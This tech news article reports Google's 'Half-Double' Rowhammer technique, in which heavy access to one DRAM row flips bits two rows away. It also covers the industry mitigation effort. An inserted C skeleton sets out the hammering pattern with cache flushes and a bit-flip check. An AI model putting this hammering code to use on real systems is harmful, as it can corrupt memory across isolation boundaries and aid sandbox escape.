Rowhammer is a known vulnerability in DRAM through which repeatedly accessing one memory row can flip bits in, and so modify the contents of, other rows that the attacker never addresses directly. The flaw was first described publicly in 2014 and affected the mainstream chips of that time, DDR3; Google published a working exploit in 2015.
Essentially, the vulnerability exists because of an electrical coupling phenomenon in the silicon, so it bypasses software- and hardware-based memory protection: the attacking code only ever reads memory it is allowed to read. To defend against this flaw, many DRAM manufacturers implemented proprietary logic in their chips that tracks frequently accessed rows and reactively mitigates the effect by refreshing their neighbours (commonly called Target Row Refresh). However, even with DDR4 and newer memory chips, Rowhammer can still be exploited through methods such as TRRespass, which finds access patterns those trackers miss.
Now, Google has disclosed a new Rowhammer technique dubbed "Half-Double" which reaches further than the vanilla version. While the latter let you flip bits in the row immediately adjacent to the one you repeatedly accessed, Google has demonstrated that the effect reaches one row further, although with reduced potency, and it notes that rows even farther away may be reachable.
In its research, the company found that when it hammered row "A" a large number of times while accessing the neighbouring row "B" only a few dozen times, bit flips appeared in row "C", two rows away from A. This is demonstrated in the graphic below.
Google went on to say that:
Unlike TRRespass, which exploits the blind spots of manufacturer-dependent defenses, Half-Double is an intrinsic property of the underlying silicon substrate. This is likely an indication that the electrical coupling responsible for Rowhammer is a property of distance, effectively becoming stronger and longer-ranged as cell geometries shrink down. Distances greater than two are conceivable.
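The access pattern described above, as an added example that is not code from Google's post or from this article: a C skeleton that issues the Half-Double pattern, hammering a far aggressor row A heavily while touching the near aggressor B only a few dozen times, then checks the victim row C for flipped bits. It assumes an x86 CPU for `_mm_clflush` and assumes the three pointers map to physically adjacent DRAM rows, which ordinary malloc memory does not guarantee; the row size, data patterns and access counts are illustrative choices, not values from the page.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <emmintrin.h>                 /* _mm_clflush */
#define EVICT(p) _mm_clflush((const void *)(p))
#else
#define EVICT(p) ((void)(p))           /* no flush instruction: accesses may be served from cache */
#endif

/* Row size is an assumption for this demo; real DRAM row sizes depend on the part. */
#define ROW_BYTES 8192

/* Read one byte and evict its cache line so that the next read of it activates
 * the DRAM row again. Without the eviction every access after the first hits
 * the cache and the row is never re-opened, which is why naive loops do not hammer. */
static inline void dram_access(volatile uint8_t *p) {
    uint8_t v = *p;
    (void)v;
    EVICT(p);
}

/* Half-Double access pattern: row_a (the far aggressor) is hammered n_far times
 * and row_b (the near aggressor, between A and the victim C) is touched only
 * n_near times, spread evenly through the loop. Returns the number of DRAM
 * accesses issued. The caller is responsible for row_a and row_b being
 * physically adjacent rows; this function does not and cannot check that. */
static uint64_t hammer_half_double(volatile uint8_t *row_a, volatile uint8_t *row_b,
                                   uint64_t n_far, uint64_t n_near) {
    uint64_t near_every = (n_near > 0 && n_near <= n_far) ? n_far / n_near : 1;
    uint64_t issued_near = 0;
    for (uint64_t i = 0; i < n_far; i++) {
        dram_access(row_a);
        if (issued_near < n_near && i % near_every == 0) {
            dram_access(row_b);
            issued_near++;
        }
    }
    return n_far + issued_near;
}

/* Count bits in the victim row that differ from the pattern it was filled with
 * and record the offset of the first corrupted byte (len if there is none). */
static size_t count_bit_flips(const uint8_t *row, size_t len, uint8_t pattern, size_t *first_off) {
    size_t flips = 0;
    if (first_off) *first_off = len;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = (uint8_t)(row[i] ^ pattern);
        if (diff == 0) continue;
        if (first_off && *first_off == len) *first_off = i;
        for (; diff; diff &= (uint8_t)(diff - 1)) flips++;   /* popcount of the differing bits */
    }
    return flips;
}

int main(void) {
    /* Three consecutive "rows" A, B, C in one allocation (constructed demo input).
     * In a real experiment these must map to adjacent physical DRAM rows, which
     * needs physical addresses (e.g. huge pages) and the platform's DRAM address
     * mapping; plain malloc memory gives no such guarantee, so this run normally
     * reports zero flips. */
    uint8_t *buf = malloc(3 * ROW_BYTES);
    if (!buf) return 1;
    uint8_t *row_a = buf, *row_b = buf + ROW_BYTES, *row_c = buf + 2 * ROW_BYTES;
    memset(row_a, 0x00, ROW_BYTES);          /* aggressors hold 0 bits ... */
    memset(row_b, 0x00, ROW_BYTES);
    memset(row_c, 0xFF, ROW_BYTES);          /* ... victim holds 1 bits, to provoke 1->0 flips */

    uint64_t accesses = hammer_half_double(row_a, row_b, 1000000, 50);
    size_t off;
    size_t flips = count_bit_flips(row_c, ROW_BYTES, 0xFF, &off);
    printf("%llu accesses, %zu flipped bits in row C", (unsigned long long)accesses, flips);
    if (flips) printf(" (first at byte offset %zu)", off);
    printf("\n");
    free(buf);
    return 0;
}
```

The eviction in `dram_access` is what separates an actual hammer from a loop that merely hits the cache; on real hardware a practitioner would additionally need physical-address-aware allocation, far more iterations than shown, and test data in both polarities, since flips occur in both directions.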
Overall, the vulnerability is significant because, in the worst case, it enables a malicious piece of code to escape its sandbox and potentially take over the system. As such, Google is working with industry partners such as JEDEC, an independent semiconductor engineering standards organization, to figure out potential solutions. The firm has also published two documents describing mitigation techniques, which you can view here and here.
Google hopes that by disclosing its findings publicly, industry partners and researchers will work together towards a more permanent solution. This is a particularly dangerous class of attack because it lets software bypass security policies through the physics of the hardware, so it will require wider collaboration across the industry.